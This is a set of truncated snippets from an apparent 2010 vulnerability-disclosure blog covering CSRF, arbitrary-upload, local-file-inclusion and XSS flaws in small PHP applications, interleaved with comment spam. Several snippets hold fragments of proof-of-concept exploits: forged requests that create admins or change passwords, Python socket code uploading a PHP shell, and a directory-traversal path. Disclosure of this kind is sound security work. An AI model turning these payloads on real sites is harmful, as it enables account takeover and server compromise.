cross-site-scripting.blogspot.com
XSS - Cross-Site Scripting: InterPhoto 2.3.0 Cross-site Request Forgery
http://cross-site-scripting.blogspot.com/2010/07/interphoto-230-cross-site-request.html
XSS - Cross-Site Scripting. And Other Web Related Deception. This site is soon to be deprecated by http:/ www.johnleitch.net. Sunday, July 11, 2010. InterPhoto 2.3.0 Cross-site Request Forgery. A cross-site request forgery vulnerability in InterPhoto 2.3.0 can be exploited to change a user's password. Img src=http:/ localhost/interphoto/mydesk.edit.php? Posted by John Leitch. Labels: Cross-site Request Forgery. July 15, 2011 at 6:02 PM. Good post. Thanks for sharing. July 5, 2015 at 5:18 PM. ChillyCMS 1&...
cross-site-scripting.blogspot.com
XSS - Cross-Site Scripting: NetworX 1.03 Arbitrary Upload
http://cross-site-scripting.blogspot.com/2010/07/networx-103-arbitrary-upload.html
XSS - Cross-Site Scripting. And Other Web Related Deception. This site is soon to be deprecated by http:/ www.johnleitch.net. Monday, July 5, 2010. NetworX 1.03 Arbitrary Upload. An arbitrary upload vulnerability in NetworX 1.0.3 can be exploited to upload a PHP shell. Import sys, socket. S = socket.socket(socket.AF INET, socket.SOCK STREAM). Sconnect( host, port). Ssend('POST ' path '/upload.php? Logout=shell.php HTTP/1.1 r n'. Host: ' host ' r n'. Proxy-Connection: keep-alive r n'. User-Agent: x r n'.
cross-site-scripting.blogspot.com
XSS - Cross-Site Scripting: nuBuilder 10.04.20 Local File Inclusion
http://cross-site-scripting.blogspot.com/2010/07/nubuilder-100420-local-file-inclusion.html
XSS - Cross-Site Scripting. And Other Web Related Deception. This site is soon to be deprecated by http:/ www.johnleitch.net. Monday, July 5, 2010. NuBuilder 10.04.20 Local File Inclusion. A local file inclusion vulnerability in nuBuilder 10.04.20 can be exploited to include arbitrary files. Http:/ localhost/nubuilder-10.04.20/productionnu2/fileuploader.php? Dir=/ ././././././windows/system.ini. Posted by John Leitch. July 12, 2010 at 9:38 AM. December 8, 2011 at 10:02 PM. Yachts for sale phuket. Compare...
cross-site-scripting.blogspot.com
XSS - Cross-Site Scripting: PeteWiki 0.6 Reflected XSS
http://cross-site-scripting.blogspot.com/2010/07/petewiki-06-reflected-xss.html
XSS - Cross-Site Scripting. And Other Web Related Deception. This site is soon to be deprecated by http:/ www.johnleitch.net. Sunday, July 11, 2010. PeteWiki 0.6 Reflected XSS. A reflected cross-site scripting vulnerability in PeteWiki 0.6 can be exploited to execute arbitrary JavaScript. Posted by John Leitch. December 13, 2011 at 9:39 PM. Best home security companies. Subscribe to: Post Comments (Atom). View my complete profile. CMS Made Simple 1.8 Download Manager 1.4.1 Module . Wiki Web Help 0.2&...
cross-site-scripting.blogspot.com
XSS - Cross-Site Scripting: nuBuilder 10.04.20 Reflected XSS
http://cross-site-scripting.blogspot.com/2010/07/nubuilder-100420-reflected-xss.html
XSS - Cross-Site Scripting. And Other Web Related Deception. This site is soon to be deprecated by http:/ www.johnleitch.net. Monday, July 5, 2010. NuBuilder 10.04.20 Reflected XSS. An XSS vulnerability in nuBuilder 10.04.20 can be exploited to. Http:/ localhost/nubuilder-10.04.20/productionnu2/nuedit.php? Posted by John Leitch. February 1, 2012 at 2:32 AM. Installazione pannelli fotovoltaici roma. May 31, 2016 at 5:42 PM. Authentic louis vuitton handbags. Polo ralph lauren outlet. NetworX 1.0.3 ...Orbis...
cross-site-scripting.blogspot.com
XSS - Cross-Site Scripting: July 2010
http://cross-site-scripting.blogspot.com/2010_07_01_archive.html
XSS - Cross-Site Scripting. And Other Web Related Deception. This site is soon to be deprecated by http:/ www.johnleitch.net. Sunday, July 11, 2010. CMS Made Simple 1.8 Download Manager 1.4.1 Module Arbitrary Upload. An arbitrary upload vulnerability in CMS Made Simple 1.8 Download Manager 1.4.1 Module can be exploited to upload a PHP shell. Import socket, re. S = socket.socket(socket.AF INET, socket.SOCK STREAM). Sconnect( host, port). Host: localhost r n'. Proxy-Connection: keep-alive r n'. Posted by J...
cross-site-scripting.blogspot.com
XSS - Cross-Site Scripting: RunCMS 2.1 Magpie RSS Module Reflected Cross-site Scripting
http://cross-site-scripting.blogspot.com/2010/07/runcms-21-magpie-rss-module-reflected.html
XSS - Cross-Site Scripting. And Other Web Related Deception. This site is soon to be deprecated by http:/ www.johnleitch.net. Sunday, July 11, 2010. RunCMS 2.1 Magpie RSS Module Reflected Cross-site Scripting. A reflected cross-site scripting vulnerability in RunCMS 2.1 Magpie RSS Module can be exploited to execute arbitrary JavaScript. Http:/ localhost/runcms2.1/modules/headlines/magpierss/scripts/magpie debug.php? Posted by John Leitch. November 12, 2011 at 8:34 AM. November 12, 2011 at 6:59 PM. Uhm Yo...
cross-site-scripting.blogspot.com
XSS - Cross-Site Scripting: Lion Wiki 3.2.3 Reflected Cross-site Scripting
http://cross-site-scripting.blogspot.com/2010/07/lion-wiki-323-reflected-cross-site.html
XSS - Cross-Site Scripting. And Other Web Related Deception. This site is soon to be deprecated by http:/ www.johnleitch.net. Sunday, July 11, 2010. Lion Wiki 3.2.3 Reflected Cross-site Scripting. A reflected cross-site scripting vulnerability in Lion Wiki 3.2.3 can be exploited to execute arbitrary JavaScript. Posted by John Leitch. December 13, 2011 at 9:39 PM. Best home security companies. Good link. thnak for sharing! April 4, 2012 at 9:42 AM. Kitchen and Bath Design. April 6, 2012 at 10:38 AM. The c...
cross-site-scripting.blogspot.com
XSS - Cross-Site Scripting: chillyCMS 1.1.3 Cross-site Request Forgery
http://cross-site-scripting.blogspot.com/2010/07/chillycms-113-cross-site-request.html
XSS - Cross-Site Scripting. And Other Web Related Deception. This site is soon to be deprecated by http:/ www.johnleitch.net. Sunday, July 11, 2010. ChillyCMS 1.1.3 Cross-site Request Forgery. A cross-site request forgery vulnerability in chillyCMS 1.1.3 can be exploited to create a new admin. Body onload=document.forms[0].submit(). Form method=POST action=http:/ localhost/chillyCMS/admin/usersgroups.site.php. Input type=hidden name=user value=new admin /. Input type=hidden name=name value=a /. Http:/ ww...
cross-site-scripting.blogspot.com
XSS - Cross-Site Scripting: LifeType 1.2.10 Cross-site Request Forgery
http://cross-site-scripting.blogspot.com/2010/07/lifetype-1210-cross-site-request.html
XSS - Cross-Site Scripting. And Other Web Related Deception. This site is soon to be deprecated by http:/ www.johnleitch.net. Sunday, July 11, 2010. LifeType 1.2.10 Cross-site Request Forgery. A cross-site request forgery vulnerability in LifeType 1.2.10 can be exploited to create a new admin. Img src=http:/ localhost/lifetype-1.2.10/admin.php? UserName=newadmin&userFullName=&newUserPassword=Password1&userEmail=a%40a.com&userStatus=1&blogId=1&blogName=asdfasdfs&userPermissions%5B49%5D=49&userPermissi...